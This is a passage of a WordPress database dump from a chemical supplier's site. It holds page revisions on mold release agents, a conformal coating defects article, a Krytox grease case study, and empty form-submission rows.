Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-Based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories ids="21" number="10"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-25 19:37:32', '2016-11-25 19:37:32', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3140, 3, '2016-11-25 19:38:21', '2016-11-25 19:38:21', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\r\nMiller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield unmatched utility and efficient for the robust and constantly evolving composite industry. These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistance, and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of ReleaSys semi-permanents mold release agents and PTFE Dry Film release agents, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-25 19:38:21', '2016-11-25 19:38:21', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3141, 3, '2016-11-25 19:39:12', '2016-11-25 19:39:12', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122SE</a> is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <span style="font-size: 105%;"><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong></span><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <span style="font-size: 100%;"><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></span>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-25 19:39:12', '2016-11-25 19:39:12', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3142, 0, '2016-11-26 05:47:35', '2016-11-26 05:47:35', '', '', '', 'publish', 'closed', 'closed', '', '3142', '', '', '2016-11-26 05:47:36', '2016-11-26 05:47:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/3142/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3143, 194, '2016-11-28 06:54:56', '2016-11-28 06:54:56', '', '', '', 'publish', 'closed', 'closed', '', '3143', '', '', '2016-11-28 06:54:56', '2016-11-28 06:54:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/3143/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3144, 0, '2016-11-28 11:09:39', '2016-11-28 11:09:39', '', '', '', 'publish', 'closed', 'closed', '', '3144', '', '', '2016-11-28 11:09:39', '2016-11-28 11:09:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3144/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3145, 195, '2016-11-28 13:32:14', '2016-11-28 13:32:14', '', '', '', 'publish', 'closed', 'closed', '', '3145', '', '', '2016-11-28 13:32:14', '2016-11-28 13:32:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/3145/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3146, 196, '2016-11-28 13:59:31', '2016-11-28 13:59:31', '', '', '', 'publish', 'closed', 'closed', '', '3146', '', '', '2016-11-28 13:59:31', '2016-11-28 13:59:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3146/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3147, 197, '2016-11-28 14:43:28', '2016-11-28 14:43:28', '', '', '', 'publish', 'closed', 'closed', '', '3147', '', '', '2016-11-28 14:43:28', '2016-11-28 14:43:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3147/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3148, 3, '2016-11-28 17:00:46', '2016-11-28 17:00:46', '<h1>Common Conformal Coating Defects and Repairs</h1>\r\nA Conformal coating is a protective chemical coating or polymer film 25-75µm thick (50µm typical) that ‘conforms’ to the circuit board topology. Its purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Due to the critical application these coating play, proper application is of the utmost importance.  However from time-to-time issues and coating failures do occur and operators and Quality Manager must know how to spot them and promptly correct.  This article will describe and users identify the 6 most common conformal coating defects, their causes, and how they can be repaired. The 6 most common conformal coating defect are the following:\r\n<ol>\r\n 	<li>Capillary Flow</li>\r\n 	<li>Cracking</li>\r\n 	<li>De-wetting</li>\r\n 	<li>Delamination</li>\r\n 	<li>Pin-holes, Bubbles, Foam</li>\r\n 	<li>Orange Peel</li>\r\n</ol>\r\nEach of the above conformal defects can a substantial effect the ultimate performance and protective barrier potential of the applied coating.  Thankfully most of these defects can be avoided by proper substrate preparation and even, uniform application.\r\n<h2><span style="text-decoration: underline;">1. Capillary Flow</span></h2>\r\nCapillary flow in conformal coating is where the coating pulls or runs away from certain areas of a PCB to more favorable sectors due to a combination of effects. At best, the resulting conformal coating is uneven and patchy; at worst, the substrate is left completely uncoated. Factors that can impact capillary flow of conformal coatings include coatings that are too thin, an over-application of coating, or an attempt to coat a surface that is too cool or that is contaminated, among others. Because of this vulnerability to contaminants, cleaning the surface of the product prior to coating is crucial to achieving the desired end result, as is correctly applying the optimal coating for a given application.\r\n<h3>Factors to Correct / Prevent Capillary Flow:</h3>\r\n<ul>\r\n 	<li>Reducing the conformal coating thickness</li>\r\n 	<li>Sufficiently cleaning the coating of all contaminates with a Precision Cleaning Agent (MS-555 or MS-580N)</li>\r\n 	<li>Apply heat to the board prior to application</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">De-wetting</span></h2>\r\nDe-wetting is the tendency of the coating material to wet the surface that it has been applied to evenly. Contamination can prevent a conformal coating solution from evenly adhering, leveling and "wetting" the substrate. In the event of such a problem, areas of the product remain uncoated, exposing the substrate to further contamination and coating failure. Cleanliness is the key to avoiding this conformal coating defect. Contamination can originate from mold release agents, residual surfactant and fluxes from the PCB manufacturing process, cleaning bath contamination, or residual moisture on the board surface.\r\n<h3>Factors to Correct / Prevent De-wetting:</h3>\r\n<ul>\r\n 	<li>Minimization of surface contaminates before assembly; low residue fluxes and pastes</li>\r\n 	<li>Proper cleaning of substrate surface with high purity / low NVR solvents</li>\r\n 	<li>If de-wetting occurs, locally strip area with MS-114 Conformal Coating Stripper and reapply coating</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">2. Cracking</span></h2>\r\nCracking in conformal coating is where a smooth surface fractures into sections with the cracks in the coating leaving the area below exposed to potential contaminants. Cracking is often attributed to temperatures that are too high during the curing or drying processes. However, cracking of the conformal coating can also be caused by particularly low temperatures or by the application of a coating that is too thick. Film thickness that is too large causes coefficient of thermal expansion (CTE) mismatches and yields cracking of the conformal coating. Strategies for avoiding this defect include reducing coating thickness to manage the coefficient of thermal expansion and paying strict attention to temperature control.\r\n<h3>Factors to Correct / Prevent Cracking:</h3>\r\n<ul>\r\n 	<li>Reduce initial cure temperature</li>\r\n 	<li>Allow increased drying time at room temperature before exposing to cure temperatures</li>\r\n 	<li>Reduce coating thickness</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">3. Delamination</span></h2>\r\nDelamination in conformal coating is where the coating lifts from the surface of the PCB, leaving the area below exposed.', 'Common Conformal Coating Defects and How to Repair Them', '', 'inherit', 'closed', 'closed', '', '3089-revision-v1', '', '', '2016-11-28 17:00:46', '2016-11-28 17:00:46', '', 3089, 'https://www.miller-stephenson.com/3089-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3149, 201, '2016-11-28 21:51:12', '2016-11-28 21:51:12', '', '', '', 'publish', 'closed', 'closed', '', '3149', '', '', '2016-11-28 21:51:13', '2016-11-28 21:51:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3149/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3150, 202, '2016-11-29 06:47:15', '2016-11-29 06:47:15', '', '', '', 'publish', 'closed', 'closed', '', '3150', '', '', '2016-11-29 06:47:16', '2016-11-29 06:47:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3150/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3151, 202, '2016-11-29 06:56:04', '2016-11-29 06:56:04', '', '', '', 'publish', 'closed', 'closed', '', '3151', '', '', '2016-11-29 06:56:05', '2016-11-29 06:56:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/3151/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3152, 2, '2016-11-29 13:37:15', '2016-11-29 13:37:15', '<h3>Krytox XHT-BDZ Case Study</h3>\n<p>Krytox XHT-BDZ Steam Turbine Governor Control Valve Application</p>\n<p>An American electricity generating company reduces downtime and helps improve the bottom line by switching greases.</p>\n<p>Major U.S. Supplier to the Electric Grid Improves Performance and Saves Money</p>\n<p>A major electricity generation company located in the United States was experiencing problems with the governor control valves in its steam turbines, because the grease it was using was drying out. This problem required the utility to shut down the base load unit for repair and to re-sleeve the bearings at least four times a year. Because the base load unit provides more than 500 megawatts to the electric grid, these frequent downtimes compromised the power supply and cost the company a significant loss of revenue.</p>\n<p><strong>The Challenge</strong><img class="wp-image-3153 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/xht-800x770.jpg" alt="xht" width="470" height="452" /></p>\n<p>The valve configuration used by the company is unique because it is only 10 feet from the turbine rather than the standard distance of 30 feet or more. As a result, the control valves are exposed to significantly higher temperatures than a control valve typically experiences. The company needed a grease that could handle extreme high temperatures that the cam shaft bearings and fulcrum pins are exposed to on a daily basis, and<br />\nnot evaporate and cause the valve to seize— like the lubricant it had been using.</p>\n<p><strong>The Solution</strong></p>\n<p>Krytox <a href="https://www.miller-stephenson.com/product/krytox-xht-bdz/">XHT-BDZ</a> grease easily withstood the extreme high temperatures of this application without evaporating, enabling the control valves to operate continuously. By switching from a competitor’s product to Krytox XHT-BDZ grease, the company was able to help eliminate the need for costly quarterly shutdowns, which meant improved reliability of supply to the electric grid and enhanced company revenues.</p>\n<p><strong>Key Advantages</strong></p>\n<ul>\n<li>Using Krytox XHT-BDZ grease, the utility was able to avoid frequent shutdowns, thus improving the reliability of supply to the electric grid and enhancing the bottom line.</li>\n<li>Cam shaft bearings and fulcrum pins stay well lubricated day in and day out, despite constant exposure to extremely high temperatures—thanks to Krytox XHT-BDZ grease.</li>\n<li>Krytox XHT-BDZ grease can provide similar benefits for steam turbine governor control valves used in paper manufacturing, chemical processing, or refinery operations.</li>\n</ul>\n<p>&nbsp;</p>\n[ux_product_categories ids="123" number="10"]', 'Krytox XHT-BDZ Case Study', '', 'publish', 'closed', 'closed', '', 'krytox-xht-bdz-case-study', '', '', '2016-11-29 13:39:39', '2016-11-29 13:39:39', '', 0, 'https://www.miller-stephenson.com/?p=3152', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3153, 2, '2016-11-29 13:28:16', '2016-11-29 13:28:16', '', 'xht', '', 'inherit', 'closed', 'closed', '', 'xht', '', '', '2016-11-29 13:28:16', '2016-11-29 13:28:16', '', 3152, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/xht.jpg', 0, 'attachment', 'image/jpeg', 0); 
